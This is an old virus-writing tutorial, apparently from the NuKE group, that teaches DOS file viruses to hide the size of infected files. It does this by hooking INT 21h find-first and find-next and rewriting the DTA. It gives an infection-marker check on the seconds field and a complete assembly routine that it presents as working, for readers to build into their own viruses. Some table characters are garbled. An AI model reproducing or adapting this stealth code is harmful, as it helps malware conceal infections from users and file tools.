98 lines
7.1 KiB
Plaintext
98 lines
7.1 KiB
Plaintext
|
|
|||
|
|
*******************************
|
|||
|
|
** Dir Stealth Method 2 **
|
|||
|
|
** **
|
|||
|
|
** By Rock Steady/NuKE **
|
|||
|
|
*******************************
|
|||
|
|
|
|||
|
|
Some May notice that when they use PCTOOLs (aka PCSHELL) or Peter Norton
|
|||
|
|
Utilities, or *SOME* File Managing systems like DOS-Shell, the File
|
|||
|
|
increase of infected files is know visable. There is no doubt about
|
|||
|
|
it, if you only put Method #1 in your virus you will encounter times
|
|||
|
|
were the file increase shows. Its not because your Routine isn't good!
|
|||
|
|
But due to the fact that there is another way to Read the Dir Listing
|
|||
|
|
by DOS. An this method is Call File-find by ASCIIZ format.
|
|||
|
|
|
|||
|
|
We just learned how to edit File-Find by FCB. Which is used by MS-DOS
|
|||
|
|
PC-DOS and some other programs. But unlike the others, they use the
|
|||
|
|
ASCIIZ file-Find method as it is EASIER to open, close, edite, and any
|
|||
|
|
other file access routine is ALOT easier with the ASCIIZ or (File Handle)
|
|||
|
|
system. So we will make our Virus Stealth to Method #2! Making us 100%
|
|||
|
|
Stealth from file-finds...
|
|||
|
|
|
|||
|
|
The Function we have to Intecept is Interrupt 21h, with Functions
|
|||
|
|
AH=4Eh (Find First Matching File) and AH=4F (Find Next Matching File)
|
|||
|
|
The Way to go about it is Very much ALIKE to the first one, so just
|
|||
|
|
understand the thoery, and you'll be able to program it within
|
|||
|
|
seconds.
|
|||
|
|
|
|||
|
|
When this function is called, it will fill the current DTA with 12
|
|||
|
|
entries totally 43 bytes. The DTA will be set up as follows: (below)
|
|||
|
|
BTW: DTA is only a place DOS uses to do Disk Transfer Areas! It ISN'T
|
|||
|
|
like the FCB, or PSP that is anyways the same! You can play with
|
|||
|
|
this as you wish. You also use this DTA to read the Command Line
|
|||
|
|
Parameters...etc...
|
|||
|
|
|
|||
|
|
Offset Size Description
|
|||
|
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
00h <20> 1 <20> Drive Letter
|
|||
|
|
01h <20> 11 <20> Seach Template (Eg:????????COM)
|
|||
|
|
0Ch <20> 1 <20> Attribute Search
|
|||
|
|
0Dh <20> 2 <20> Entry count within Directory
|
|||
|
|
0Fh <20> 2 <20> Cluster Number of start of parent directory
|
|||
|
|
11h <20> 4 <20> Reserved (Atleast Undocumented)
|
|||
|
|
15h <20> 1 <20> Attribute of File FOUND
|
|||
|
|
@ 16h <20> 2 <20> File's Time (Bits : SSSS-SMMM-MMMH-HHHH) Sec/2:Month:Year
|
|||
|
|
18h <20> 2 <20> File's Date (Bits : DDDD-DMMM-MYYY-YYYY) Day:Month:Year
|
|||
|
|
* 1Ah <20> 4 <20> File's Size (Word Reverse Order, Dah!!?!)
|
|||
|
|
1Eh <20> 13 <20> ASCIIZ File name & Extension
|
|||
|
|
* = Must be Edited by Virus is File Infected
|
|||
|
|
@ = Needed to Check if File is Infected. (Seconds Field)
|
|||
|
|
|
|||
|
|
%Algorthm%
|
|||
|
|
~~~~~~~~~~
|
|||
|
|
CONDISTION: DS:DX points to ASCIIZ of file search.
|
|||
|
|
CX: Contains File Attributes
|
|||
|
|
|
|||
|
|
Step 1. Call Dos so it fills the DTA with its findings
|
|||
|
|
Step 2. Test for CF=1 (Carry Flag) as error happened
|
|||
|
|
errors happen if File not found, no more files etc...
|
|||
|
|
Step 3. Get Seconds Field And UnMask Seconds
|
|||
|
|
Step 4. Check if seconds = 58 (What ever your using) Quit if NOT
|
|||
|
|
Notice we use `XOR AL,1Dh' rather than `CMP AL,1Dh'
|
|||
|
|
Check in your ASM Bible, which is Faster? Size?
|
|||
|
|
Remember speed & size is EVERYTHING, That is why
|
|||
|
|
My lastest are quite small viriis for stealthness!!
|
|||
|
|
Step 5. If Infected Subtract Virus Size from File
|
|||
|
|
Step 6. Quit
|
|||
|
|
|
|||
|
|
;This is the routine. once you get AH=4Eh/4Fh in you Int 21h Call this
|
|||
|
|
;Routine... (Look at Method #1 for Int21h handler)
|
|||
|
|
Dir_Stealth2
|
|||
|
|
pushf ;Fake an Int Call
|
|||
|
|
push cs ;Save our location
|
|||
|
|
call int21Call ;Step #1
|
|||
|
|
jc no_good ;Error Split
|
|||
|
|
push ax
|
|||
|
|
push bx
|
|||
|
|
push es
|
|||
|
|
mov ah,51h ;Get Current DTA
|
|||
|
|
int 21h ;ES:BX --> DTA
|
|||
|
|
|
|||
|
|
mov ax,es:[bx+16h] ;Get File Time
|
|||
|
|
and ax,1fh ;Un Mask Seconds field
|
|||
|
|
xor al,1dh ;Is it 58 Seconds?
|
|||
|
|
jnz not_infected ;Not infected! Dah?
|
|||
|
|
sub es:[bx+1Ah],Virus_Size ;Minus Virus Size!
|
|||
|
|
sbb es:[bx+1Ch],0 ;Fix up the Sub, Carrying!
|
|||
|
|
not_infected:
|
|||
|
|
pop es
|
|||
|
|
pop bx ;Restore Registers
|
|||
|
|
pop ax
|
|||
|
|
no_Good:iret
|
|||
|
|
; This code WORKS and is also 100% (c) Rock Steady / NuKE
|
|||
|
|
;--------------------------EnD-------------------------------
|
|||
|
|
|
|||
|
|
Rock Steady
|
|||
|
|
`WaTch OuT WaReZ PuPpiEs NuKE PoX V2.0 WiLl GeTcHa'
|